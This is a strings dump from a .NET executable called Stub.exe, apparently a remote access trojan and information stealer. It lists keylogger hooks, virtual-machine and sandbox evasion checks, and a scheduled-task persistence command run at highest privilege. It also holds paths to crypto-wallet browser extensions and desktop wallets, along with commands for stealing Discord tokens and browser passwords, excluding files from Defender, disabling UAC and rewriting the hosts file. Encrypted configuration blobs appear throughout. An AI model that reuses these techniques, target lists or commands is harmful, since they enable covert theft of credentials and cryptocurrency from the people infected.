!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
<Read>b__0
<Read>b__2_1
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
NKQPPfsFFwTFA
ITinCcWlKpxKA
RgxFFmMfYcVA
LhvpuirmHQYCBZA
MsHMpfloWaA
OcfPMZHElYrfA
VmTqzJsTmICmA
SystemParametersInfoA
WDJgzwrWoJqA
ONUtDhbArA
wbikNnNNlHB
ZJCLMBkzqSuIB
rzQKtFwERuDUVSB
vOvTczOdKUB
IWrWdZxLiLWnYB
ZHvFQtGLbB
ddiOvCfKLifxB
zhLPCUznnmJDC
DGnQsgyvCosHJC
hlXUcnhTKC
tyrmWOCVsKC
BjIPOXNszurQOC
gWrewuquoTsKSC
qugrQgJyPUC
VLInLuNDVC
yaxixPqTVC
JpGmyIeOgKeC
UKggoazePeC
ERjXIlSfIXhC
EoPHejqZkC
hzrnNxROIQsAnC
hTFmnSNkNaeVGD
MapNameToOID
get_FormatID
FroazEKGANqlPD
CSVOIdWClcZsgLFE
PbrTGtwBFxgBVE
zYRkbBrhvEcE
XpUBdUhYefmkhvdE
puKjFecgQZqhiE
zbaSIcnOMjlkRmklE
OkvhAszpwE
MNjsjFBISrkfxE
UQiakpykGfizE
uZdGuFVWbNGqCNF
cRmnnVHwTF
WpxFEsGRgyWF
LMTqVAKIRgF
YVVtXeAwhF
XNoaaCWokF
NDinhZPQfTmF
uzSgDBtUALDTpF
TkFvYbeDcUCeqF
tZMVhFEZStF
yoyNtSdLNxF
KjkeXdlInXxF
faBvhhsCmOWJG
RBYfpEocMrKG
WPvebbQHrOG
FjoVFNfhWztGRG
UkwZGqUNBXG
uTjLYpgUjiaG
zYiSrmuwTSBnG
cRBeCYidiuAAH
KwIbMIxsEiuBH
reYWGzvvuGCCH
nZRjDzbQpLEWCH
mLGWWqyQnTGiEEH
hIiGPOxHTTOtEH
NxmXLbYvMxjLnFH
cXQEUmHbxFH
hKUNYBPJQtrGH
DLebsHkXlnWIH
cufrShPvxxJH
lUgAsFleGGDLH
KPzFVxlPRNMH
wMgmqARtrcPTH
aPAKWYNBKrqDVH
dFkvrmGzXH
FAMoQgAaxKcH
sCKiuozHjH
llHCQEuSkduH
pkdMMuDLGI
get_ASCII
BlRiPaeUkIgaMNI
IYOVUSirjTI
cEopDYLCZYI
vHyDBAJiJcI
eMETKulACdI
IJEOSbkBqrI
PiRazvceqEJ
VSZwkcuDUrFNHJ
idXgXioujFKJ
EizemYFFRJ
EbCrLGUEcxJ
IgTSUaRwzYjVIzJ
imbAGGiRNFK
XqSKzsHYEJNHZK
MPvAmhSysK
mFnbpeENMWQLtK
yQyzWIvwiMqdNJBL
DHltxtsqpCTEEL
CnXouQbofMIL
qXfIegVkqqqTL
aGOosrndLnybZUL
FpwbNNIzyYL
qEFWnlmVZL
XFComOrDXTeL
pnWEwpnMaosL
FFbxQoFBvL
XBZdzHSDdxrDM
IvjnDvCurlstHM
uieIkfzdewXMM
XVhfdJKHyNM
xKtwjhYCfzmmzEsWM
ErcJQFTSbLHOdrM
YZpzAaWvMHuM
waDOFJQuipFN
zcEpIcjpCiJN
ERCxWbNjNSN
mmrIaFrdwYN
cXZcIJyNhFSaN
JPpTWufspgN
XgBiOtbhtvN
HCMEuGQjzN
pqZypSvFYiozN
PpXpLupIqcjGO
fJiReFthLHO
System.IO
OPNvpEHYFUWUO
eWQnWPrfybO
fvvqrvAMeO
VlMKHXvwVLmnO
nzcfkvjZXlHEsO
cYxYriLkoKhxHP
uAiWoUPTsOP
yszTvYajWeNPP
sWdxNGKRcQP
ZeDihqnBhKMUP
qYoXMlNnrVmRYP
ASKOjFEmvgokTEjP
SllwlgsvNzGzDvP
hPvZnPUbzLaNBSAQ
pyKNvyyeVlTFQ
IRGhTiLPGMQ
yBxWlfzBCDatUMQ
jKrFkiBFOwJYBOQ
dfDLvYDxpVerYQ
KdUKgOyDIYeQ
EdttfKiEdQhyjQ
QyTZBMVkonQ
gurJcgIswvivvQ
UAxBHpEcfhDR
rmFcovpNnKGQR
YaQvqPbyFYR
WtKTSHODwKsQBJaR
JrOgwRpxBbR
DNarXvYCpoPcR
EWWzrQInwdR
ItMWqAJNFNgR
rIhcVcBUgiR
uRXsdcERfumR
icxAQXkPEvLoR
nFKZAiwSVeQPvR
PDgeBqBoSZtxR
LOSLINGOTES
PbQePVyMmOQS
fOokrRkBkYgYrS
VmltRqUZAVHwS
TEESJcgeLkSedUwS
DnELpJxlqmzS
xFoTaVxYABOT
BRMpIFUhNqCPT
LPUAdXRgvmmZT
sVHjfDTQoYaT
kIMDpvexEPcbT
ZzrulAElwbT
GCdEtIOIVwT
VHBQRqrbcJpCU
UPpGycfgtlKU
IiAVGUhHdNNsKNU
EPTyCYGEqjFQU
LzHyILTtLWU
wVMNpELDJVQZU
nSaUDEzWLIHZfU
ZyAqOjyefqKnU
get_IV
set_IV
GenerateIV
YygotZhfGESV
moXfxhjVTKhdV
zFkWSwaoWFYfV
lvtUTeDUQgAnV
iQPVtlStApV
tOHXBcCzrRIW
ExajibyOcztHVVW
LIJpBIlvVW
usaPwaiZhW
AWvqeboUkW
HuqPZKVvzStW
GfWpepCUUkcJAdHX
aeaGoBdbJGyBUX
kPxoyTmPcwkX
EvWSSyXGpX
lvWJoxhlnHsX
uWJpdsJvjgOwX
xVyIaspfqokxX
hIpOPqxgXzX
cgLVMeInjDJAY
KKsKecYvJGPIMY
eCkuhabDhPPY
PJmEAJAbdYyqvRY
xoZTXDhsSXY
ajKviVjVyxOZY
aqFtvCLiwaY
jYOWEfbTbtIkfY
uxZxzOtxzAlY
HQUTFtgBRxxY
GWxHjctXKfMZ
dFcQOfdOzJTZ
CNBaPKzbAlUZ
AnBxEPFsfkZ
value__
uXfoqVzkxnRQTAa
wXTExKhTTfRKa
MmiCMIUkVWOa
ZEvIzvWKFanhTPa
eXggSmLeSyPa
LShoJSPtGAMXlSa
IPnFhRJVTHVmkVa
dniZGCAWFRJXa
yRiQRpKWOFYa
BXsLEXdteYaa
uVwAGEBlvGea
rNTNUPdqmIprnwa
PZCXUEeIudyFb
NGPlNNIeDdtASSb
AfixKcklZb
erJxQXsZRSwOtbb
UmULfGWDtgWdcb
mscorlib
jjpTAgyAnJkyjb
kcTmbIwWnb
bRxrPxkeTrb
aZlNJGJxzAc
KTqFNHMCFc
TdfZneHYJFc
PyAMNTcYmMc
RbLPsCAtcEsRc
qZyCwqgCIlMUc
TGSuOVQyqEGac
dPksvTVzpJfgac
yPBJWuMhHNbfc
oGrlOzzswLkNic
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
vpVvfQPTwECkrc
fMFXmCFmNTRuc
UNCHTgjlfUzc
GetWindowThreadProcessId
GetProcessById
ZoaiCrpPDeQd
ZJVrsDjSkPeSSd
vbwksiiBlSTd
HRACIVtXkPbQUd
EndRead
BeginRead
Thread
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
Append
RegistryValueKind
CompareMethod
method
Clipboard
gIsWVeZUawd
hncSGYGlfJIe
ExfcmbJkYwRe
iJujQmcabvbRXsvVe
ifFlHWzEXe
DnOKqiUMYe
zXEvbRvZNGHRYe
WvpKlHafkFObe
iCHkoWvnbe
hSKuZIGkcepsbe
OQuYnVkPuYce
Replace
IsNullOrWhiteSpace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
UiDrxfEAee
DeleteSubKeyTree
get_Message
EndInvoke
BeginInvoke
GetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
DownloadFile
IsInRole
WindowsBuiltInRole
get_MainWindowTitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
get_ProcessName
CheckHostName
DateTime
MsMHfJtPSbyLGne
WriteLine
get_NewLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
SaIzcAeiPKbAzXqe
FileShare
System.Core
MethodBase
Dispose
StrReverse
X509Certificate
Create
MulticastDelegate
GetKeyboardState
SetThreadExecutionState
SetApartmentState
GetKeyState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
UmAFGbRcGDf
SizeOf
CgBMOMgvxIyyQf
FrxOEzfzdOVef
UZgAmApmDtRHbff
CZxWPmeIrff
gRzBEECQbBinf
uXhYIXvrBHqf
xHlQVYsutf
MLvXbYwuSpxf
RCBUQpBhTQHsWTg
CryptoConfig
SQqguxPfEsig
fSieDcAicApldjg
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
UHmQtEBoXFcrg
nWhNXgeDSBh
nlHYtUNBYUEh
szNPUKjWIh
pOQyYnwJJZEMh
FZWFYdVZyuidWgVh
wwZYAkNezxuVhh
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
GetFolderPath
get_Length
EndsWith
sVWCbLzFnAFwh
bFErFcTeaPnUxh
aLerpcHxKNbzh
VejVEAXtqEi
ewmVPluYYWPuFi
CGkXonKIESCQIi
WWzVETBAwSzELi
UvIxXLhPRi
JvxRJbYlvTi
srCHPAkMDtWi
DFMBjtYHEmqruni
DdnxYijFZGceui
syGWBCfvkRXpoDj
zTZUHeyRVXHj
cwXDSEYUWmeINj
VAOHIYFKScj
KaXSIOuhiERk
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
callback
RegistryKeyPermissionCheck
FlushFinalBlock
rZjtmhaCnRek
fIJDIRetfjDlk
tUPlEGMypQBl
kzgAHeQNAHfIeCl
QATMGXanFl
DGHSzOlBoSyHl
xGeBLDDyrFIl
uCLLspcttfKl
YOgQvFlttpYMl
tEpIkrquRnXVl
JyMFDGiHlydSQWl
RtlSetProcessIsCritical
Marshal
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
ZxZzrWfWUfl
vAUkbgnRHgl
kernel32.dll
user32.dll
ntdll.dll
NBtoqIgQBvol
lwfosHJBVihul
sDjfQNOmyDwl
DMLgpXavAm
NtSmRdtFzXCm
eVubgcFlaGsGOm
NrkdIkbhqJYPm
RkbXXxuORereSWm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
lParam
wParam
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
WpbQFeIidyTlm
QcSUTVYpNINnm
ejbQNBoQeVBYnm
iBmaGulCEXom
Random
ICryptoTransform
kQBRmpNlZLvMqtm
klzbCmjsHqhIIn
ToBoolean
TimeSpan
JGzYwszNdn
DGUpoSAdmsrdn
UaMRFhmydn
eZTAyuMPxhn
X509Chain
AppDomain
get_CurrentDomain
onUpiDHOMdUln
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
RGGLxAdMiOvn
WApbohfsUFXaDo
aEyuDRdfAuNEo
lVRpYuOVWUo
ImageCodecInfo
MethodInfo
FileInfo
DriveInfo
FileSystemInfo
MemberInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
GetLastInputInfo
qkIpUkXDZKko
ySElVURTKJmo
QNRGqXPDSKamEp
WysxqAgKGp
zFKyZAAsWp
uiWxXRXPUuCoYp
fKATWPgrULap
VTGJhycqmefbXgp
OEXtXSYteADmp
ZFQmLahKmDwmp
VIIbVroSiRIVpp
Microsoft.CSharp
ntVbegpPjHSjxp
oQlsAYvDgzp
SOVqixfGZGJWq
hVaUdLvXlvfLWq
NkmgIrHxleGeq
System.Linq
nMAPSfoEUMUbpq
ZpygPezlcjxRJzq
yjNqcVdpYdfapPr
BROIgTRPsgYr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
SpecialFolder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
dFqvJpupmbnjr
HWpkgKWSsOlnr
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
ollxwJbcBs
mzeKWJoQCaRGs
JPHyDyiNLKLfSs
YFEaJJMvtlUs
HnIrrnknrXs
System.Diagnostics
FromSeconds
GetMethods
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
GetDirectories
ExpandEnvironmentVariables
GetTypes
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
BindingFlags
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
sLpaZxlINDmks
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
dLPCCwxobRJbns
Contains
System.Collections
StringSplitOptions
get_Chars
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
UUDYhJOLaRCt
IyvlHJdMUmAEt
XpFgriRVdZIeyEt
VnZtbHwKJoNt
UgizswiCSFYgvOt
tDbHIlbZQfFqYt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
object
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
XzRSQYtGdTgt
op_Explicit
FykhPNBvgDfmlt
IAsyncResult
result
ToUpperInvariant
WebClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_TickCount
get_ProcessorCount
GetPathRoot
ParameterizedThreadStart
Convert
FailFast
ToList
GetKeyboardLayout
OjZCZPaYnWjRvt
System.Collections.IEnumerator.MoveNext
System.Text
ReadAllText
GetText
SetText
GetWindowText
BXgVvYmGzt
bYksfGeefPxCu
CnENqnyYVEu
XPzxxudVspGmTu
tGfVxPnDDau
aOumQXTiSIblu
nSwCXDKwuZIou
xIXSVUHoNeXpu
JnrplRFRFuu
jwzQsdHhEv
SHHfNnTlKQLv
eKWwkiPXFNv
wEEPnLAPBeiVv
nkRuSFAQXv
wonKfHMacyYv
ZjhvWhPMJNHqcv
UqNenDaZXpISBw
IiLSxMKrcrQfpKw
KJBBVQRGYLw
eAWICeSKMw
cVqRJkbdSWUEAhoPw
yMGEnyXkrew
vfYaxSshlJIrhw
aoumWDXWuSIRshw
froJOjyxVfDOkw
GetForegroundWindow
set_CreateNoWindow
nBrvHnhifMRhrw
VVNjmRNZzVdYzw
UddabiaaCx
ToUnicodeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
zLKcJzqKUFx
NxNlLUeZmOx
ZlmgNgsJCiONYx
igxkqDrvsjSZx
mtInmjWymWxZx
JpvtiDLYhcx
aNFfzYZBFcNgx
XhIFrXDzNToHqx
hWjSgEMkVUXqx
FVAStwxjMYy
InitializeArray
ToArray
get_AsArray
njtgAbbpUby
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
MapVirtualKey
RegistryKey
System.Security.Cryptography
WLuZVHXLUNly
Assembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
VqVXrctJHxzy
iymRbcVmwHmKEz
kPUJKOHHZmvZQGz
wHbyuKZxjbMz
HwipzupjhPz
jtpGnnGorWqTz
IzzyobgxBHez
STAMBEBbBshz
rgoGIZWaYUVoz
JbqaJRwgRJsz
HQqtNondramRsz
FcswpPglziqrJNwz
WrapNonExceptionThrows
1.0.0.0
.NETFramework,Version=v4.6
FrameworkDisplayName
.NET Framework 4.6
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
3hk/UatcneIJqndFM3y9PBUMkDzN/zFpFNf0gXn9oOZO09+7jEzDQDSqB/9LZ8QhyKW5b7M3KTmT7oPI6JBDCA==
1PK76Z40cdnFrn/VeF3IMuvAUGD6p6yUBD6PRe/VrdS53ovuTp9DsIdInDm4giAp8LVduUyCBtmacy4fgbEg2pdgBny8eKvW0AqXBhhhOhM=
rk1MjwIg8ybzvdAfxol6Ej1psOT3AC+46f3xdpMaE+a7Qqb0AuKQfBidev9QtvT6Q2wiH7g0i2stWofx7qirqBD3ee9dIGpYXIe36tmqQXI=
QTiGkGHYd13viDixFV2AYar/fdz6Pxiq7Xs/aV98/EP25TplikVABr07bYlO/TuIWlcf9dC2zvbLIulnoThAPg==
%AppData%
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
Packet
Message
LastTime
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Performance
Pastebin
Antivirus
Meta_Firefox
MetaFirefox
\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Meta_Chrome
MetaChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Meta_Brave
MetaBrave
\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Meta_Edge
MetaEdge
\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
\Opera Stable\Local Extension Settings\djclckkglechooblngghdinmeemkbgci
Meta_Opera
MetaOpera
\Opera Software\Opera GX Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
\Opera Software\Opera GX Stable\Local Extension Settings\chrome-extension://djclckkglechooblngghdinmeemkbgci
Meta_OperaGX
MetaOperaGX
\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Phantom_Chrome
PhantomChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Phantom_Brave
PhantomBrave
\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Binance_Chrome
BinanceChrome
\Microsoft\Edge\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Binance_Edge
BinanceEdge
\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
TronLinkChrome
Exodus_Chrome
\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
BitKeep_Chrome
BitKeepChrome
\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Coinbase_Chrome
CoinbaseChrome
\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Ronin_Chrome
RoninChrome
\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Trust_Chrome
TrustChrome
\Google\Chrome\User Data\Default\Local Extension Settings\jkjgekcefbkpogohigkgooodolhdgcda
BitPay_Chrome
BitPayChrome
\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
F2a_Chrome
F2aChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
F2a_Brave
F2aBrave
\Microsoft\Edge\User Data\Default\Local Extension Settings\ocglkepbibnalbgmbachknglpdipeoio
F2a_Edge
F2aEdge
\Ergo Wallet
Ergo_Wallet
ErgoWallet
\Ledger Live
Ledger_Live
LedgerLive
\atomic
Atomic
\Exodus
Exodus
\Electrum
Electrum
\Coinomi
Coinomi
\Binance
Binance
\Bitcoin
Bitcoin_Core
Bitcoin Core
BoolWallets
\Mozilla\Firefox\Profiles
-release
\extensions\webextension@metamask.io.xpi
Return
Escape
LControlKey
RControlKey
RShiftKey
LShiftKey
Capital
[SPACE]
[ENTER]
[CTRL]
[Shift]
[Back]
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
\Log.tmp
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
gettxt
passload
DicordTokens
WebBrowserPass
anydesk
getscreen
WDExclusion
weburl
killps
ResetScale
KillProxy
backproxy
uacoff
Wallets
Chrome
ResetHosts
sendPlugin
Hashes
AllInOne
Password
Tokens
AVRemoval.Class1
Reset Scale succeeded!
BackProxy.Class1
wallets
\drivers\etc
\hosts.backup
\hosts
127.0.0.1
Blocked!
cmd.exe
/c taskkill.exe /im chrome.exe /f
Reset Hosts succeeded!
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0